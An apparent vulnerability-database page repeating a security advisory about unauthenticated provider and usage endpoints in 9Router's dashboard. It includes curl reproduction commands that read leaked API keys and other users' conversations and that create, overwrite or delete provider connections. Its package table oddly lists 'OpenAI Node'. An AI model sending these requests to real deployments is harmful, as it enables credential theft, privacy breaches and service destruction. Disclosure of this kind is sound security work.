GHSA-vjc7-jrh9-9j86

GHSA-vjc7-jrh9-9j86 CRITICAL
Published July 6, 2026

--- title: Unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats product: 9Router version: <= 0.4.41 severity: critical cve_request: true --- ## Summary Multiple critical API security vulnerabilities were discovered in 9Router's Next.js dashboard. The `/api/providers`...

Full CISO analysis pending enrichment.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
OpenAI Node npm <= 0.4.41 No patch
11.0K 4.6K dependents Pushed 11d ago 55% patched ~451d to patch Full package profile →

Do you use OpenAI Node? You're affected.

How severe is it?

CVSS 3.1
10.0 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
N/A

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Changed
C High
I High
A High

What should I do?

No patch available

Monitor for updates. Consider compensating controls or temporary mitigations.

Which compliance frameworks are affected?

Compliance analysis pending. Sign in for full compliance mapping when available.

Frequently Asked Questions

What is GHSA-vjc7-jrh9-9j86?

--- title: Unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats product: 9Router version: <= 0.4.41 severity: critical cve_request: true --- ## Summary Multiple critical API security vulnerabilities were discovered in 9Router's Next.js dashboard. The `/api/providers` endpoints lack authentication entirely, allowing anyone to create, read, update, and delete provider connections. Additionally, `/api/usage/stats` exposes full plaintext API keys, and `/api/usage/request-logs` + `/api/usage/request-details` expose all users' request history and full conversation contents (including system prompts, user messages, assistant responses) without authentication. ## Affected Endpoints | Endpoint | Method | Issue | |---|---|---| | `/api/providers` | GET | Lists all provider connections with partial credentials, OAuth tokens, account IDs | | `/api/providers/:id` | GET | Read any single provider detail (IDOR) | | `/api/providers` | POST | Create arbitrary provider connections with attacker-controlled API keys | | `/api/providers/:id` | PUT | Modify any existing provider connection | | `/api/providers/:id` | DELETE | Delete any provider connection | | `/api/usage/stats` | GET | Exposes full plaintext API keys, per-account usage breakdown, cost data | | `/api/usage/request-logs` | GET | Exposes all users' request logs (model, tokens, cost, timestamp, provider) | | `/api/usage/request-details/:id` | GET | Exposes full conversation turns including system prompts, user messages, assistant responses | | `/api/version` | GET | Exposes current version info | | `/api/models` | GET | Exposes full model routing catalog | | `/api/v1/models` | GET | Exposes model list | ## Impact ### Critical: Provider CRUD without authentication An attacker can: 1. **Add a malicious provider** — inject a provider that proxies through their server, capturing all prompts, responses, and API keys routed through 9Router 2. **Modify existing providers** — replace API keys with attacker-controlled ones, redirect traffic 3. **Delete all providers** — cause complete denial of service 4. **Read all provider configurations** — harvest partial credentials, GitHub Copilot OAuth tokens, Cloudflare account IDs, email addresses ### Critical: Full API key leak via /api/usage/stats The endpoint returns complete API key strings (e.g., `sk-...`) in plaintext alongside usage data per key, enabling unauthorized use of connected AI provider accounts. ### Critical: Conversation history leak `/api/usage/request-details` returns the full conversation history of other users' AI sessions, including system prompts, user messages, assistant responses, tool calls, and reasoning traces. ## Steps to Reproduce ### 1. Unauthenticated read of all providers ```bash curl -s https://<host>/api/providers ``` Returns all provider connections with email addresses, auth type, account IDs, and partial API key prefixes. ### 2. Create a provider without authentication ```bash curl -X POST https://<host>/api/providers \ -H "Content-Type: application/json" \ -d '{"provider":"openai","authType":"apikey","name":"rogue","apiKey":"sk-attacker-controlled"}' ``` Returns the created connection object with a new UUID and `isActive: true`. ### 3. Modify an existing provider without authentication ```bash curl -X PUT https://<host>/api/providers/<existing-uuid> \ -H "Content-Type: application/json" \ -d '{"name":"modified","apiKey":"sk-attacker-key"}' ``` Returns the updated connection object. ### 4. Delete a provider without authentication ```bash curl -X DELETE https://<host>/api/providers/<existing-uuid> ``` Returns `{"message":"Connection deleted successfully"}`. ### 5. Read full usage stats with API keys ```bash curl -s https://<host>/api/usage/stats ``` Returns full API key strings, per-account token/cost breakdown, recent requests. ### 6. Read request logs ```bash curl -s "https://<host>/api/usage/request-logs?page=1&pageSize=50" ``` Returns paginated request logs with timestamps, models, providers, user emails, token counts. ### 7. Read full conversation ```bash curl -s https://<host>/api/usage/request-details/<request-uuid> ``` Returns complete conversation turns for that request. ### 8. Read version info ```bash curl -s https://<host>/api/version ``` Returns `{"currentVersion":"0.4.19","latestVersion":"0.4.45","hasUpdate":true}`. ## Root Cause The Next.js API routes under `src/app/api/*` lack authentication middleware on several endpoints. Specifically: - `/api/providers/*` — No auth check before CRUD operations on provider connections stored in the database - `/api/usage/stats` — No auth check before returning aggregated usage data including full API keys - `/api/usage/request-logs` — No auth check before returning request history - `/api/usage/request-details/:id` — No auth check before returning full conversation contents ## Suggested Fix 1. Add authentication middleware to all `/api/providers/*` routes (GET, POST, PUT, DELETE) 2. Add authentication middleware to all `/api/usage/*` routes 3. Never return full API key strings in any API response — return masked keys only 4. Never return GitHub Copilot tokens or similar OAuth secrets in API responses 5. Implement proper authorization checks so users can only access their own data 6. Add rate limiting to public endpoints ## Resources - https://github.com/decolua/9router

Is GHSA-vjc7-jrh9-9j86 actively exploited?

No confirmed active exploitation of GHSA-vjc7-jrh9-9j86 has been reported, but organizations should still patch proactively.

How to fix GHSA-vjc7-jrh9-9j86?

No patch is currently available. Monitor vendor advisories for updates.

What is the CVSS score for GHSA-vjc7-jrh9-9j86?

GHSA-vjc7-jrh9-9j86 has a CVSS v3.1 base score of 10.0 (CRITICAL).

What are the technical details?

Original Advisory

--- title: Unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats product: 9Router version: <= 0.4.41 severity: critical cve_request: true --- ## Summary Multiple critical API security vulnerabilities were discovered in 9Router's Next.js dashboard. The `/api/providers` endpoints lack authentication entirely, allowing anyone to create, read, update, and delete provider connections. Additionally, `/api/usage/stats` exposes full plaintext API keys, and `/api/usage/request-logs` + `/api/usage/request-details` expose all users' request history and full conversation contents (including system prompts, user messages, assistant responses) without authentication. ## Affected Endpoints | Endpoint | Method | Issue | |---|---|---| | `/api/providers` | GET | Lists all provider connections with partial credentials, OAuth tokens, account IDs | | `/api/providers/:id` | GET | Read any single provider detail (IDOR) | | `/api/providers` | POST | Create arbitrary provider connections with attacker-controlled API keys | | `/api/providers/:id` | PUT | Modify any existing provider connection | | `/api/providers/:id` | DELETE | Delete any provider connection | | `/api/usage/stats` | GET | Exposes full plaintext API keys, per-account usage breakdown, cost data | | `/api/usage/request-logs` | GET | Exposes all users' request logs (model, tokens, cost, timestamp, provider) | | `/api/usage/request-details/:id` | GET | Exposes full conversation turns including system prompts, user messages, assistant responses | | `/api/version` | GET | Exposes current version info | | `/api/models` | GET | Exposes full model routing catalog | | `/api/v1/models` | GET | Exposes model list | ## Impact ### Critical: Provider CRUD without authentication An attacker can: 1. **Add a malicious provider** — inject a provider that proxies through their server, capturing all prompts, responses, and API keys routed through 9Router 2. **Modify existing providers** — replace API keys with attacker-controlled ones, redirect traffic 3. **Delete all providers** — cause complete denial of service 4. **Read all provider configurations** — harvest partial credentials, GitHub Copilot OAuth tokens, Cloudflare account IDs, email addresses ### Critical: Full API key leak via /api/usage/stats The endpoint returns complete API key strings (e.g., `sk-...`) in plaintext alongside usage data per key, enabling unauthorized use of connected AI provider accounts. ### Critical: Conversation history leak `/api/usage/request-details` returns the full conversation history of other users' AI sessions, including system prompts, user messages, assistant responses, tool calls, and reasoning traces. ## Steps to Reproduce ### 1. Unauthenticated read of all providers ```bash curl -s https://<host>/api/providers ``` Returns all provider connections with email addresses, auth type, account IDs, and partial API key prefixes. ### 2. Create a provider without authentication ```bash curl -X POST https://<host>/api/providers \ -H "Content-Type: application/json" \ -d '{"provider":"openai","authType":"apikey","name":"rogue","apiKey":"sk-attacker-controlled"}' ``` Returns the created connection object with a new UUID and `isActive: true`. ### 3. Modify an existing provider without authentication ```bash curl -X PUT https://<host>/api/providers/<existing-uuid> \ -H "Content-Type: application/json" \ -d '{"name":"modified","apiKey":"sk-attacker-key"}' ``` Returns the updated connection object. ### 4. Delete a provider without authentication ```bash curl -X DELETE https://<host>/api/providers/<existing-uuid> ``` Returns `{"message":"Connection deleted successfully"}`. ### 5. Read full usage stats with API keys ```bash curl -s https://<host>/api/usage/stats ``` Returns full API key strings, per-account token/cost breakdown, recent requests. ### 6. Read request logs ```bash curl -s "https://<host>/api/usage/request-logs?page=1&pageSize=50" ``` Returns paginated request logs with timestamps, models, providers, user emails, token counts. ### 7. Read full conversation ```bash curl -s https://<host>/api/usage/request-details/<request-uuid> ``` Returns complete conversation turns for that request. ### 8. Read version info ```bash curl -s https://<host>/api/version ``` Returns `{"currentVersion":"0.4.19","latestVersion":"0.4.45","hasUpdate":true}`. ## Root Cause The Next.js API routes under `src/app/api/*` lack authentication middleware on several endpoints. Specifically: - `/api/providers/*` — No auth check before CRUD operations on provider connections stored in the database - `/api/usage/stats` — No auth check before returning aggregated usage data including full API keys - `/api/usage/request-logs` — No auth check before returning request history - `/api/usage/request-details/:id` — No auth check before returning full conversation contents ## Suggested Fix 1. Add authentication middleware to all `/api/providers/*` routes (GET, POST, PUT, DELETE) 2. Add authentication middleware to all `/api/usage/*` routes 3. Never return full API key strings in any API response — return masked keys only 4. Never return GitHub Copilot tokens or similar OAuth secrets in API responses 5. Implement proper authorization checks so users can only access their own data 6. Add rate limiting to public endpoints ## Resources - https://github.com/decolua/9router

Weaknesses (CWE)

CWE-200 — Exposure of Sensitive Information to an Unauthorized Actor: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

  • [Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Timeline

Published
July 6, 2026
Last Modified
July 6, 2026
First Seen
July 7, 2026

Related Vulnerabilities